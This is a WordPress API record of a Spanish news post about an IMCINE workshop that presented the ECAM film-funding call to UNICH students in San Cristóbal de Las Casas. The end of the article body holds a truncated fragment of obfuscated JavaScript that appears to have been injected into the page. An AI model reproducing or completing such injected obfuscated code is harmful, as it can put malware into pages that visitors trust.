{"id":4856,"date":"2022-09-06T19:09:43","date_gmt":"2022-09-06T19:09:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4856"},"modified":"2022-09-06T19:09:43","modified_gmt":"2022-09-06T19:09:43","slug":"imparten-imcine-taller-caminos-comunitarios-en-el-cine-a-estudiantes-de-la-unich","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4856","title":{"rendered":"Imparten IMCINE taller Caminos Comunitarios en el Cine, a estudiantes de la UNICH"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-06-at-12.54.26-PM-1-1024x576.jpeg\" alt=\"\" class=\"wp-image-4857\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-06-at-12.54.26-PM-1-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-06-at-12.54.26-PM-1-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-06-at-12.54.26-PM-1-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-06-at-12.54.26-PM-1-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-06-at-12.54.26-PM-1.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>06 de Septiembre del 2022. San Crist\u00f3bal de Las Casas.- Daniela Contreras, quien est\u00e1 a cargo del Est\u00edmulo a la Creaci\u00f3n Audiovisual en M\u00e9xico (ECAM) y Centroam\u00e9rica para comunidades ind\u00edgenas y afrodescendientes del Instituto Mexicano de Cinematograf\u00eda (Imcine) dio a conocer que impartieron el taller de Caminos Comunitarios en el Cine, taller de inducci\u00f3n y de presentaci\u00f3n de la convocatoria ECAM a estudiantes y egresados de la Universidad Intercultural de Chiapas (UNICH). \u201cEl objetivo de estos talleres es que las personas se acerquen m\u00e1s a esta convocatoria, que la conozcan, que conozcan c\u00f3mo funciona, para que puedan inscribir sus proyectos a la convocatoria, fueron dos d\u00edas. Se explica a fondo la convocatoria, cada parte, todos los requisitos, se les explica c\u00f3mo presentar el proyecto, toda la documentaci\u00f3n que necesitan, y le sean menos dif\u00edcil presentarlos\u201d, dijo. Aunque no tiene el dato preciso, sabe que varias personas del estado de Chiapas, a\u00f1os atr\u00e1s han presentado proyectos, y la pr\u00f3xima convocatoria, ser\u00e1 emitida en noviembre de este a\u00f1o 2022-2023. Dentro de los requisitos mas especifico revel\u00f3, es que el director o directora del proyecto debe ser una persona que se auto adscriban como ind\u00edgena o afrodescendiente, y la convocatoria ser\u00e1 ubicada en todas las plataformas de IMCINE. Para la convocatoria, se pueden inscribir a diferentes categor\u00edas como cortometraje producci\u00f3n, cortometraje post producci\u00f3n para el que se le destina un recurso de 350 mil pesos,  para largometraje producci\u00f3n 650 mil pesos, y largometraje post producci\u00f3n 850 mil pesos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 06 de Septiembre del 2022. San Crist\u00f3bal de Las Casas.- Daniela Contreras, quien est\u00e1 a cargo del Est\u00edmulo a la Creaci\u00f3n Audiovisual en M\u00e9xico (ECAM) y Centroam\u00e9rica para comunidades ind\u00edgenas y afrodescendientes del Instituto Mexicano de Cinematograf\u00eda (Imcine) dio a conocer que impartieron el taller de Caminos Comunitarios en el Cine, taller de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4857,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-4856","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4856","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4856"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4856\/revisions"}],"predecessor-version":[{"id":4858,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4856\/revisions\/4858"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4857"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4856"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4856"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4856"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}